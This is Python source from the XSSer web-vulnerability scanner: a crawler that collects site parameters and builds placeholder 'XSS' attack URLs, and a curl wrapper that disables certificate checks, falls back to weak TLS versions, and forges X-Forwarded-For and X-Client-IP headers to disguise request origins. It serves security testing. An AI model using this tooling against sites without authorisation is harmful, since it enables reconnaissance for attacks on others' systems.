#!/usr/bin/env python 2 | # -*- coding: utf-8 -*-" 3 | # vim: set expandtab tabstop=4 shiftwidth=4: 4 | """ 5 | This file is part of the XSSer project, https://xsser.03c8.net 6 | 7 | Copyright (c) 2010/2021 | psy 8 | 9 | xsser is free software; you can redistribute it and/or modify it under 10 | the terms of the GNU General Public License as published by the Free 11 | Software Foundation version 3 of the License. 12 | 13 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 14 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 15 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 16 | details. 17 | 18 | You should have received a copy of the GNU General Public License along 19 | with xsser; if not, write to the Free Software Foundation, Inc., 51 20 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 21 | """ 22 | import sys 23 | import urllib.request, urllib.parse, urllib.error 24 | import time 25 | import traceback 26 | from . import curlcontrol 27 | from . import threadpool 28 | from queue import Queue 29 | from collections import defaultdict 30 | from bs4 import BeautifulSoup 31 | from bs4.dammit import EncodingDetector 32 | try: 33 | import pycurl 34 | except: 35 | print("\n[Error] Cannot import lib: pycurl. \n\n To install it try:\n\n $ 'sudo apt-get install python3-pycurl' or 'pip3 install pycurl'\n") 36 | sys.exit() 37 | class EmergencyLanding(Exception): 38 | pass 39 | 40 | class Crawler(object): 41 | """ 42 | Crawler class. 43 | """ 44 | def __init__(self, parent, curlwrapper=None, crawled=None, pool=None): 45 | # verbose: 0-no printing, 1-prints dots, 2-prints full output 46 | self.verbose = 0 47 | self._parent = parent 48 | self._to_crawl = [] 49 | self._parse_external = True 50 | self._requests = [] 51 | self._ownpool = False 52 | self._reporter = None 53 | self._armed = True 54 | self._poolsize = 10 55 | self._found_args = defaultdict(list) 56 | self.pool = pool 57 | if crawled: 58 | self._crawled = crawled 59 | else: 60 | self._crawled = [] 61 | if curlwrapper: 62 | self.curl = curlwrapper 63 | else: 64 | self.curl = curlcontrol.Curl 65 | 66 | def report(self, msg): 67 | if self._reporter: 68 | self._reporter.report(msg) 69 | else: 70 | print(msg) 71 | 72 | def set_reporter(self, reporter): 73 | self._reporter = reporter 74 | 75 | def _find_args(self, url): 76 | """ 77 | find parameters in given url. 78 | """ 79 | parsed = urllib.parse.urlparse(url) 80 | if "C=" in parsed.query and "O=" in parsed.query: 81 | qs = "" 82 | else: 83 | qs = urllib.parse.parse_qs(parsed.query) 84 | if parsed.scheme: 85 | path = parsed.scheme + "://" + parsed.netloc + parsed.path 86 | else: 87 | path = parsed.netloc + parsed.path 88 | for arg_name in qs: 89 | key = (arg_name, parsed.netloc) 90 | zipped = list(zip(*self._found_args[key])) 91 | if not zipped or not path in zipped[0]: 92 | self._found_args[key].append([path, url]) 93 | self.generate_result(arg_name, path, url) 94 | if not qs: 95 | parsed = urllib.parse.urlparse(url) 96 | if path.endswith("/"): 97 | attack_url = path + "XSS" 98 | else: 99 | attack_url = path + "/XSS" 100 | if not attack_url in self._parent.crawled_urls: 101 | self._parent.crawled_urls.append(attack_url) 102 | ncurrent = sum([len(s) for s in list(self._found_args.values())]) 103 | if ncurrent >= self._max: 104 | self._armed = False 105 | 106 | def cancel(self): 107 | self._armed = False 108 | 109 | def crawl(self, path, depth=3, width=0, local_only=True): 110 | """ 111 | setup and perform a crawl on the given url. 112 | """ 113 | if not self._armed: 114 | return [] 115 | parsed = urllib.parse.urlparse(path) 116 | basepath = parsed.scheme + "://" + parsed.netloc 117 | self._parse_external = not local_only 118 | if not self.pool: 119 | self.pool = threadpool.ThreadPool(self._poolsize) 120 | if self.verbose == 2: 121 | self.report("crawling: " + path) 122 | if width == 0: 123 | self._max = 1000000000 124 | else: 125 | self._max = int(width) 126 | self._path = path 127 | self._depth = depth 128 | attack_urls = [] 129 | if not self._parent._landing and self._armed: 130 | self._crawl(basepath, path, depth, width) 131 | # now parse all found items 132 | if self._ownpool: 133 | self.pool.dismissWorkers(len(self.pool.workers)) 134 | self.pool.joinAllDismissedWorkers() 135 | return attack_urls 136 | 137 | def shutdown(self): 138 | if self._ownpool: 139 | self.pool.dismissWorkers(len(self.pool.workers)) 140 | self.pool.joinAllDismissedWorkers() 141 | 142 | def generate_result(self, arg_name, path, url): 143 | parsed = urllib.parse.urlparse(url) 144 | qs = urllib.parse.parse_qs(parsed.query) 145 | qs_joint = {} 146 | for key, val in qs.items(): 147 | qs_joint[key] = val[0] 148 | attack_qs = dict(qs_joint) 149 | attack_qs[arg_name] = "XSS" 150 | attack_url = path + '?' + urllib.parse.urlencode(attack_qs) 151 | if not attack_url in self._parent.crawled_urls: 152 | self._parent.crawled_urls.append(attack_url) 153 | 154 | def _crawl(self, basepath, path, depth=3, width=0): 155 | """ 156 | perform a crawl on the given url. 157 | 158 | this function downloads and looks for links. 159 | """ 160 | self._crawled.append(path) 161 | if not path.startswith("http"): 162 | return 163 | 164 | def _cb(request, result): 165 | self._get_done(depth, width, request, result) 166 | 167 | self._requests.append(path) 168 | self.pool.addRequest(self._curl_main, [[path, depth, width, basepath]], 169 | self._get_done_dummy, self._get_error) 170 | 171 | def _curl_main(self, pars): 172 | path, depth, width, basepath = pars 173 | if not self._armed or len(self._parent.crawled_urls) >= self._max: 174 | raise EmergencyLanding 175 | c = self.curl() 176 | c.set_timeout(5) 177 | try: 178 | res = c.get(path) 179 | except Exception as error: 180 | c.close() 181 | del c 182 | raise error 183 | c_info = c.info().get('content-type', None) 184 | c.close() 185 | del c 186 | self._get_done(basepath, depth, width, path, res, c_info) 187 | 188 | def _get_error(self, request, error): 189 | path, depth, width, basepath = request.args[0] 190 | e_type, e_value, e_tb = error 191 | if e_type == pycurl.error: 192 | errno, message = e_value.args 193 | if errno == 28: 194 | print("requests pyerror -1") 195 | self.enqueue_jobs() 196 | self._requests.remove(path) 197 | return # timeout 198 | else: 199 | self.report('crawler curl error: '+message+' ('+str(errno)+')') 200 | elif e_type == EmergencyLanding: 201 | pass 202 | else: 203 | traceback.print_tb(e_tb) 204 | self.report('crawler error: '+str(e_value)+' '+path) 205 | if not e_type == EmergencyLanding: 206 | for reporter in self._parent._reporters: 207 | reporter.mosquito_crashed(path, str(e_value)) 208 | self.enqueue_jobs() 209 | self._requests.remove(path) 210 | 211 | def _emergency_parse(self, html_data, start=0): 212 | links = set() 213 | pos = 0 214 | try: 215 | data_len = len(html_data) 216 | except: 217 | data_len = html_data 218 | try: 219 | while pos < data_len: 220 | if len(links)+start > self._max: 221 | break 222 | pos = html_data.find("href=", pos) 223 | if not pos == -1: 224 | sep = html_data[pos+5] 225 | if sep == "h": 226 | pos -= 1 227 | sep=">" 228 | href = html_data[pos+6:html_data.find(sep, pos+7)].split("#")[0] 229 | pos = pos+1 230 | links.add(href) 231 | else: 232 | break 233 | except: 234 | pass 235 | return [{'href': s} for s in links] 236 | 237 | def _get_done_dummy(self, request, result): 238 | path = request.args[0][0] 239 | self.enqueue_jobs() 240 | self._requests.remove(path) 241 | 242 | def enqueue_jobs(self): 243 | if len(self.pool.workRequests) < int(self._max/2): 244 | while self._to_crawl: 245 | next_job = self._to_crawl.pop() 246 | self._crawl(*next_job) 247 | 248 | def _get_done(self, basepath, depth, width, path, html_data, content_type): 249 | if not self._armed or len(self._parent.crawled_urls) >= self._max: 250 | raise EmergencyLanding 251 | try: 252 | encoding = content_type.split(";")[1].split("=")[1].strip() 253 | except: 254 | encoding = None 255 | try: 256 | soup = BeautifulSoup(html_data, 'html.parser') 257 | links = None 258 | except: 259 | soup = None 260 | links = self._emergency_parse(html_data) 261 | for reporter in self._parent._reporters: 262 | reporter.start_crawl(path) 263 | if not links and soup: 264 | links = soup.findAll('a') 265 | forms = soup.findAll('form') 266 | for form in forms: 267 | pars = {} 268 | if "action" in form: 269 | action_path = urllib.parse.urljoin(path, form["action"]) 270 | else: 271 | action_path = path 272 | for input_par in form.findAll('input'): 273 | if "name" not in input_par: 274 | continue 275 | value = "foo" 276 | if "value" in input_par and input_par["value"]: 277 | value = input_par["value"] 278 | pars[input_par["name"]] = value 279 | for input_par in form.findAll('select'): 280 | pars[input_par["name"]] = "1" 281 | if pars: 282 | links.append({"url":action_path + '?' + urllib.parse.urlencode(pars)}) 283 | else: 284 | links.append({"url":action_path}) 285 | links += self._emergency_parse(html_data, len(links)) 286 | if self.verbose == 2: 287 | self.report(" "*(self._depth-depth) + path +" "+ str(len(links))) 288 | elif self.verbose: 289 | sys.stdout.write(".") 290 | sys.stdout.flush() 291 | if len(links) > self._max: 292 | links = links[:self._max] 293 | for a in links: 294 | try: 295 | #href = str(a['href'].encode('utf-8')) 296 | href = str(a['href']) 297 | except KeyError: 298 | # this link has no href 299 | continue 300 | except: 301 | # can't decode or something darker.. 302 | continue 303 | if href.startswith("javascript") or href.startswith('mailto:'): 304 | continue 305 | href = urllib.parse.urljoin(path, href) 306 | if not href.startswith("http") or not "." in href: 307 | continue 308 | href = href.split('#',1)[0] 309 | scheme_rpos = href.rfind('http://') 310 | if not scheme_rpos in [0, -1]: 311 | # looks like some kind of redirect so we try both too ;) 312 | href1 = href[scheme_rpos:] 313 | href2 = href[:scheme_rpos] 314 | self._check_url(basepath, path, href1, depth, width) 315 | self._check_url(basepath, path, href2, depth, width) 316 | self._check_url(basepath, path, href, depth, width) 317 | return self._found_args 318 | 319 | def _check_url(self, basepath, path, href, depth, width): 320 | """ 321 | process the given url for a crawl 322 | check to see if we have to continue crawling on the given url. 323 | """ 324 | do_crawling = self._parse_external or href.startswith(basepath) 325 | if do_crawling and not href in self._crawled: 326 | self._find_args(href) 327 | for reporter in self._parent._reporters: 328 | reporter.add_link(path, href) 329 | if self._armed and depth>0: 330 | if len(self._to_crawl) < self._max: 331 | self._to_crawl.append([basepath, href, depth-1, width]) 332 | -------------------------------------------------------------------------------- /core/curlcontrol.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*-" 3 | # vim: set expandtab tabstop=4 shiftwidth=4: 4 | """ 5 | This file is part of the XSSer project, https://xsser.03c8.net 6 | 7 | Copyright (c) 2010/2020 | psy 8 | 9 | xsser is free software; you can redistribute it and/or modify it under 10 | the terms of the GNU General Public License as published by the Free 11 | Software Foundation version 3 of the License. 12 | 13 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 14 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 15 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 16 | details. 17 | 18 | You should have received a copy of the GNU General Public License along 19 | with xsser; if not, write to the Free Software Foundation, Inc., 51 20 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 21 | """ 22 | import os, urllib.request, urllib.parse, urllib.error, email, re, time, random, sys 23 | from io import StringIO as StringIO 24 | try: 25 | import pycurl 26 | except: 27 | print("\n[Error] Cannot import lib: pycurl. \n\n To install it try:\n\n $ 'sudo apt-get install python3-pycurl' or 'pip3 install pycurl'\n") 28 | sys.exit() 29 | class Curl: 30 | """ 31 | Class to control curl on behalf of the application. 32 | """ 33 | cookie = None 34 | dropcookie = None 35 | referer = None 36 | headers = None 37 | proxy = None 38 | ignoreproxy = None 39 | tcp_nodelay = None 40 | xforw = None 41 | xclient = None 42 | atype = None 43 | acred = None 44 | #acert = None 45 | retries = 1 46 | delay = 0 47 | followred = 0 48 | fli = None 49 | agents = [] # user-agents 50 | try: 51 | f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents 52 | except: 53 | f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing 54 | for line in f: 55 | agents.append(line) 56 | agent = random.choice(agents).strip() # set random user-agent 57 | 58 | def __init__(self, base_url="", fakeheaders=[ 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg', 'Connection: Keep-Alive', 'Content-type: application/x-www-form-urlencoded; charset=UTF-8']): 59 | self.handle = pycurl.Curl() 60 | self._closed = False 61 | self.set_url(base_url) 62 | self.verbosity = 0 63 | self.signals = 1 64 | self.payload = "" 65 | self.header = StringIO() 66 | self.fakeheaders = fakeheaders 67 | self.headers = None 68 | self.set_option(pycurl.SSL_VERIFYHOST, 0) 69 | self.set_option(pycurl.SSL_VERIFYPEER, 0) 70 | try: 71 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_2) # max supported version by pycurl 72 | except: 73 | try: 74 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_1) 75 | except: # use vulnerable TLS/SSL versions (TLS1_0 -> weak enc | SSLv2 + SSLv3 -> deprecated) 76 | try: 77 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_0) 78 | except: 79 | try: 80 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) 81 | except: 82 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv2) 83 | self.set_option(pycurl.FOLLOWLOCATION, 0) 84 | self.set_option(pycurl.MAXREDIRS, 50) 85 | # this is 'black magic' 86 | self.set_option(pycurl.COOKIEFILE, '/dev/null') 87 | self.set_option(pycurl.COOKIEJAR, '/dev/null') 88 | self.set_timeout(30) 89 | self.set_option(pycurl.NETRC, 1) 90 | self.set_nosignals(1) 91 | 92 | def payload_callback(x): 93 | self.payload += str(x) 94 | self.set_option(pycurl.WRITEFUNCTION, payload_callback) 95 | def header_callback(x): 96 | self.header.write(str(x)) 97 | self.set_option(pycurl.HEADERFUNCTION, header_callback) 98 | 99 | def set_url(self, url): 100 | """ 101 | Set HTTP base url. 102 | """ 103 | self.base_url = url 104 | self.set_option(pycurl.URL, self.base_url) 105 | return url 106 | 107 | def set_cookie(self, cookie): 108 | """ 109 | Set HTTP cookie. 110 | """ 111 | self.cookie = cookie 112 | self.dropcookie = dropcookie 113 | if dropcookie: 114 | self.set_option(pycurl.COOKIELIST, 'ALL') 115 | self.set_option(pycurl.COOKIE, None) 116 | else: 117 | self.set_option(pycurl.COOKIELIST, '') 118 | self.set_option(pycurl.COOKIE, self.cookie) 119 | return cookie 120 | 121 | def set_agent(self, agent): 122 | """ 123 | Set HTTP user agent. 124 | """ 125 | self.agent = agent 126 | self.set_option(pycurl.USERAGENT, self.agent) 127 | return agent 128 | 129 | def set_referer(self, referer): 130 | """ 131 | Set HTTP referer. 132 | """ 133 | self.referer = referer 134 | self.set_option(pycurl.REFERER, self.referer) 135 | return referer 136 | 137 | def set_headers(self, headers): 138 | """ 139 | Set extra headers. 140 | """ 141 | self.set_option(pycurl.HTTPHEADER, [str(headers)]) 142 | 143 | def set_proxy(self, ignoreproxy, proxy): 144 | """ 145 | Set the proxy to use. 146 | """ 147 | self.proxy = proxy 148 | self.ignoreproxy = ignoreproxy 149 | if ignoreproxy: 150 | self.set_option(pycurl.PROXY, "") 151 | else: 152 | self.set_option(pycurl.PROXY, self.proxy) 153 | return proxy 154 | 155 | def set_option(self, *args): 156 | """ 157 | Set the given option. 158 | """ 159 | self.handle.setopt(*args) 160 | 161 | def set_verbosity(self, level): 162 | """ 163 | Set the verbosity level. 164 | """ 165 | self.set_option(pycurl.VERBOSE, level) 166 | 167 | def set_nosignals(self, signals="1"): 168 | """ 169 | Disable signals. 170 | 171 | curl will be using other means besides signals to timeout 172 | """ 173 | self.signals = signals 174 | self.set_option(pycurl.NOSIGNAL, self.signals) 175 | return signals 176 | 177 | def set_tcp_nodelay(self, tcp_nodelay): 178 | """ 179 | Set the TCP_NODELAY option. 180 | """ 181 | self.tcp_nodelay = tcp_nodelay 182 | self.set_option(pycurl.TCP_NODELAY, tcp_nodelay) 183 | return tcp_nodelay 184 | 185 | def set_timeout(self, timeout): 186 | """ 187 | Set timeout for requests. 188 | """ 189 | self.set_option(pycurl.CONNECTTIMEOUT,timeout) 190 | self.set_option(pycurl.TIMEOUT, timeout) 191 | return timeout 192 | 193 | def set_follow_redirections(self, followred, fli): 194 | """ 195 | Set follow locations parameters to follow redirection pages (302) 196 | """ 197 | self.followred = followred 198 | self.fli = fli 199 | if followred: 200 | self.set_option(pycurl.FOLLOWLOCATION , 1) 201 | self.set_option(pycurl.MAXREDIRS, 50) 202 | if fli: 203 | self.set_option(pycurl.MAXREDIRS, fli) 204 | else: 205 | self.set_option(pycurl.FOLLOWLOCATION , 0) 206 | return followred 207 | 208 | def do_head_check(self, urls): 209 | """ 210 | Send a HEAD request before to start to inject to verify stability of the target 211 | """ 212 | for u in urls: 213 | self.set_option(pycurl.URL, u) 214 | self.set_option(pycurl.NOBODY,1) 215 | self.set_option(pycurl.FOLLOWLOCATION, 1) 216 | self.set_option(pycurl.MAXREDIRS, 50) 217 | self.set_option(pycurl.SSL_VERIFYHOST, 0) 218 | self.set_option(pycurl.SSL_VERIFYPEER, 0) 219 | try: 220 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_2) # max supported version by pycurl 221 | except: 222 | try: 223 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_1) 224 | except: # use vulnerable TLS/SSL versions (TLS1_0 -> weak enc | SSLv2 + SSLv3 -> deprecated) 225 | try: 226 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_0) 227 | except: 228 | try: 229 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) 230 | except: 231 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv2) 232 | if self.fakeheaders: 233 | from core.randomip import RandomIP 234 | if self.xforw: 235 | generate_random_xforw = RandomIP() 236 | xforwip = generate_random_xforw._generateip('') 237 | xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)] 238 | if self.xclient: 239 | generate_random_xclient = RandomIP() 240 | xclientip = generate_random_xclient._generateip('') 241 | xclientfakevalue = ['X-Client-IP: ' + str(xclientip)] 242 | if self.xforw: 243 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue) 244 | if self.xclient: 245 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue + xclientfakevalue) 246 | elif self.xclient: 247 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xclientfakevalue) 248 | if self.headers: 249 | self.fakeheaders = self.fakeheaders + self.headers 250 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders) 251 | if self.agent: 252 | self.set_option(pycurl.USERAGENT, self.agent) 253 | if self.referer: 254 | self.set_option(pycurl.REFERER, self.referer) 255 | if self.proxy: 256 | self.set_option(pycurl.PROXY, self.proxy) 257 | if self.ignoreproxy: 258 | self.set_option(pycurl.PROXY, "") 259 | if self.timeout: 260 | self.set_option(pycurl.CONNECTTIMEOUT, self.timeout) 261 | self.set_option(pycurl.TIMEOUT, self.timeout) 262 | if self.signals: 263 | self.set_option(pycurl.NOSIGNAL, self.signals) 264 | if self.tcp_nodelay: 265 | self.set_option(pycurl.TCP_NODELAY, self.tcp_nodelay) 266 | if self.cookie: 267 | self.set_option(pycurl.COOKIE, self.cookie) 268 | try: 269 | self.handle.perform() 270 | except: 271 | return 272 | if str(self.handle.getinfo(pycurl.HTTP_CODE)) in ["302", "301"]: 273 | self.set_option(pycurl.FOLLOWLOCATION, 1) 274 | 275 | def __request(self, relative_url=None, headers=None): 276 | """ 277 | Perform a request and returns the payload. 278 | """ 279 | if self.fakeheaders: 280 | from core.randomip import RandomIP 281 | if self.xforw: 282 | """ 283 | Set the X-Forwarded-For to use. 284 | """ 285 | generate_random_xforw = RandomIP() 286 | xforwip = generate_random_xforw._generateip('') 287 | xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)] 288 | if self.xclient: 289 | """ 290 | Set the X-Client-IP to use. 291 | """ 292 | generate_random_xclient = RandomIP() 293 | xclientip = generate_random_xclient._generateip('') 294 | xclientfakevalue = ['X-Client-IP: ' + str(xclientip)] 295 | if self.xforw: 296 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue) 297 | if self.xclient: 298 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue + xclientfakevalue) 299 | elif self.xclient: 300 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xclientfakevalue) 301 | if headers: 302 | self.set_headers(headers) 303 | if self.agent: 304 | self.set_option(pycurl.USERAGENT, self.agent) 305 | if self.referer: 306 | self.set_option(pycurl.REFERER, self.referer) 307 | if self.proxy: 308 | self.set_option(pycurl.PROXY, self.proxy) 309 | if self.ignoreproxy: 310 | self.set_option(pycurl.PROXY, "") 311 | if relative_url: 312 | self.set_option(pycurl.URL,os.path.join(self.base_url,relative_url)) 313 | if self.timeout: 314 | self.set_option(pycurl.CONNECTTIMEOUT, self.timeout) 315 | self.set_option(pycurl.TIMEOUT, self.timeout) 316 | if self.signals: 317 | self.set_option(pycurl.NOSIGNAL, self.signals) 318 | if self.tcp_nodelay: 319 | self.set_option(pycurl.TCP_NODELAY, self.tcp_nodelay) 320 | if self.cookie: 321 | self.set_option(pycurl.COOKIE, self.cookie) 322 | if self.followred: 323 | self.set_option(pycurl.FOLLOWLOCATION , 1) 324 | self.set_option(pycurl.MAXREDIRS, 50) 325 | if self.fli: 326 | self.set_option(pycurl.MAXREDIRS, int(self.fli)) 327 | else: 328 | self.set_option(pycurl.FOLLOWLOCATION , 0) 329 | if self.fli: 330 | print("\n[E] You must launch --follow-redirects command to set correctly this redirections limit\n") 331 | return 332 | """ 333 | Set the HTTP authentication method: Basic, Digest, GSS, NTLM or Certificate 334 | """ 335 | if self.atype and self.acred: 336 | atypelower = self.atype.lower() 337 | if atypelower not in ( "basic", "digest", "ntlm", "gss" ): 338 | print("\n[E] HTTP authentication type value must be: Basic, Digest, GSS or NTLM\n") 339 | return 340 | acredregexp = re.search(r"^(.*?)\:(.*?)$", self.acred) 341 | if not acredregexp: 342 | print("\n[E] HTTP authentication credentials value must be in format username:password\n") 343 | return 344 | user = acredregexp.group(1) 345 | password = acredregexp.group(2) 346 | self.set_option(pycurl.USERPWD, "%s:%s" % (user,password)) 347 | if atypelower == "basic": 348 | self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC) 349 | elif atypelower == "digest": 350 | self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_DIGEST) 351 | elif atypelower == "ntlm": 352 | self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_NTLM) 353 | elif atypelower == "gss": 354 | self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_GSSNEGOTIATE) 355 | else: 356 | self.set_option(pycurl.HTTPAUTH, None) 357 | self.set_option(pycurl.HTTPHEADER, ["Accept:"]) 358 | elif self.atype and not self.acred: 359 | print("\n[E] You specified the HTTP authentication type, but did not provide the credentials\n") 360 | return 361 | elif not self.atype and self.acred: 362 | print("\n[E] You specified the HTTP authentication credentials, but did not provide the type\n") 363 | return 364 | #if self.acert: 365 | # acertregexp = re.search("^(.+?),\s*(.+?)$", self.acert) 366 | # if not acertregexp: 367 | # print "\n[E] HTTP authentication certificate option must be 'key_file,cert_file'\n" 368 | # return 369 | # # os.path.expanduser for support of paths with ~ 370 | # key_file = os.path.expanduser(acertregexp.group(1)) 371 | # cert_file = os.path.expanduser(acertregexp.group(2)) 372 | # self.set_option(pycurl.SSL_VERIFYHOST, 0) 373 | # self.set_option(pycurl.SSL_VERIFYPEER, 1) 374 | # self.set_option(pycurl.SSH_PUBLIC_KEYFILE, key_file) 375 | # self.set_option(pycurl.CAINFO, cert_file) 376 | # self.set_option(pycurl.SSLCERT, cert_file) 377 | # self.set_option(pycurl.SSLCERTTYPE, 'p12') 378 | # self.set_option(pycurl.SSLCERTPASSWD, '1234') 379 | # self.set_option(pycurl.SSLKEY, key_file) 380 | # self.set_option(pycurl.SSLKEYPASSWD, '1234') 381 | # for file in (key_file, cert_file): 382 | # if not os.path.exists(file): 383 | # print "\n[E] File '%s' doesn't exist\n" % file 384 | # return 385 | self.set_option(pycurl.SSL_VERIFYHOST, 0) 386 | self.set_option(pycurl.SSL_VERIFYPEER, 0) 387 | self.header.seek(0,0) 388 | self.payload = "" 389 | for count in range(0, self.retries): 390 | time.sleep(self.delay) 391 | if self.dropcookie: 392 | self.set_option(pycurl.COOKIELIST, 'ALL') 393 | nocookie = ['Set-Cookie: ', ''] 394 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + nocookie) 395 | try: 396 | self.handle.perform() 397 | except: 398 | return 399 | return self.payload 400 | 401 | def get(self, url="", headers=None, params=None): 402 | """ 403 | Get a url. 404 | """ 405 | if params: 406 | url += "?" + urllib.parse.urlencode(params) 407 | self.set_option(pycurl.HTTPGET, 1) 408 | return self.__request(url, headers) 409 | 410 | def post(self, cgi, params, headers): 411 | """ 412 | Post a url. 413 | """ 414 | self.set_option(pycurl.POST, 1) 415 | self.set_option(pycurl.POSTFIELDS, params) 416 | return self.__request(cgi, headers) 417 | 418 | def body(self): 419 | """ 420 | Get the payload from the latest operation. 421 | """ 422 | return self.payload 423 | 424 | def info(self): 425 | """ 426 | Get an info dictionary from the selected url. 427 | """ 428 | self.header.seek(0,0) 429 | url = self.handle.getinfo(pycurl.EFFECTIVE_URL) 430 | if url.startswith('http'): 431 | self.header.readline() 432 | m = email.message_from_string(str(self.header)) 433 | else: 434 | m = email.message_from_string(str(StringIO())) 435 | #m['effective-url'] = url 436 | m['http-code'] = str(self.handle.getinfo(pycurl.HTTP_CODE)) 437 | m['total-time'] = str(self.handle.getinfo(pycurl.TOTAL_TIME)) 438 | m['namelookup-time'] = str(self.handle.getinfo(pycurl.NAMELOOKUP_TIME)) 439 | m['connect-time'] = str(self.handle.getinfo(pycurl.CONNECT_TIME)) 440 | #m['pretransfer-time'] = str(self.handle.getinfo(pycurl.PRETRANSFER_TIME)) 441 | #m['redirect-time'] = str(self.handle.getinfo(pycurl.REDIRECT_TIME)) 442 | #m['redirect-count'] = str(self.handle.getinfo(pycurl.REDIRECT_COUNT)) 443 | #m['size-upload'] = str(self.handle.getinfo(pycurl.SIZE_UPLOAD)) 444 | #m['size-download'] = str(self.handle.getinfo(pycurl.SIZE_DOWNLOAD)) 445 | #m['speed-upload'] = str(self.handle.getinfo(pycurl.SPEED_UPLOAD)) 446 | m['header-size'] = str(self.handle.getinfo(pycurl.HEADER_SIZE)) 447 | m['request-size'] = str(self.handle.getinfo(pycurl.REQUEST_SIZE)) 448 | m['response-code'] = str(self.handle.getinfo(pycurl.RESPONSE_CODE)) 449 | m['ssl-verifyresult'] = str(self.handle.getinfo(pycurl.SSL_VERIFYRESULT)) 450 | try: 451 | m['content-type'] = (self.handle.getinfo(pycurl.CONTENT_TYPE) or '').strip(';') 452 | except: 453 | m['content-type'] = str("text/html; charset=UTF-8") 454 | m['cookielist'] = str(self.handle.getinfo(pycurl.INFO_COOKIELIST)) 455 | #m['content-length-download'] = str(self.handle.getinfo(pycurl.CONTENT_LENGTH_DOWNLOAD)) 456 | #m['content-length-upload'] = str(self.handle.getinfo(pycurl.CONTENT_LENGTH_UPLOAD)) 457 | #m['encoding'] = str(self.handle.getinfo(pycurl.ENCODING)) 458 | return m 459 | 460 | @classmethod 461 | def print_options(cls): 462 | """ 463 | Print selected options. 464 | """ 465 | print("\nCookie:", cls.cookie) 466 | print("User Agent:", cls.agent) 467 | print("Referer:", cls.referer) 468 | print("Extra Headers:", cls.headers) 469 | if cls.xforw == True: 470 | print("X-Forwarded-For:", "Random IP") 471 | else: 472 | print("X-Forwarded-For:", cls.xforw) 473 | if cls.xclient == True: 474 | print("X-Client-IP:", "Random IP") 475 | else: 476 | print("X-Client-IP:", cls.xclient) 477 | print("Authentication Type:", cls.atype) 478 | print("Authentication Credentials:", cls.acred) 479 | if cls.ignoreproxy == True: 480 | print("Proxy:", "Ignoring system default HTTP proxy") 481 | else: 482 | print("Proxy:", cls.proxy) 483 | print("Timeout:", cls.timeout) 484 | if cls.tcp_nodelay == True: 485 | print("Delaying:", "TCP_NODELAY activate") 486 | else: 487 | print("Delaying:", cls.delay, "seconds") 488 | if cls.followred == True: 489 | print("Follow 302 code:", "active") 490 | if cls.fli: 491 | print("Limit to follow:", cls.fli) 492 | else: 493 | print("Delaying:", cls.delay, "seconds") 494 | print("Retries:", cls.retries, "\n") 495 | 496 | def answered(self, check): 497 | """ 498 | Check for occurence of a string in the payload from 499 | the latest operation. 500 | """ 501 | return self.payload.find(check) >= 0 502 | 503 | def close(self): 504 | """ 505 | Close the curl handle. 506 | """ 507 | self.handle.close() 508 | self.header.close() 509 | self._closed = True 510 | 511 | def __del__(self): 512 | if not self._closed: 513 | self.close() 514 | -------------------------------------------------------------------------------- /core/dork.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*-" 3 | # vim: set expandtab tabstop=4 shiftwidth=4: 4 | """ 5 | This file is part of the XSSer project, https://xsser.03c8.net 6 | 7 | Copyright (c) 2010/2020 | psy 8 | 9 | xsser is free software; you can redistribute it and/or modify it under 10 | the terms of the GNU General Public License as published by the Free 11 | Software Foundation version 3 of the License. 12 | 13 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 14 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 15 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 16 | details. 17 | 18 | You should have received a copy of the GNU General Public License along 19 | with xsser; if not, write to the Free Software Foundation, Inc., 51 20 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 21 | ........ 22 | 23 | List of search engines: https://en.wikipedia.org/wiki/List_of_search_engines 24 | 25 | Currently supported: duck(default), startpage, yahoo, bing 26 | 27 | """ 28 | import urllib.request, urllib.error, urllib.parse, traceback, re, random 29 | urllib.request.socket.setdefaulttimeout(5.0) 30 | 31 | DEBUG = 0 32 | 33 | class Dorker(object): 34 | def __init__(self, engine='duck'): 35 | self._engine = engine 36 | self.search_engines = [] # available dorking search engines 37 | self.search_engines.append('duck') 38 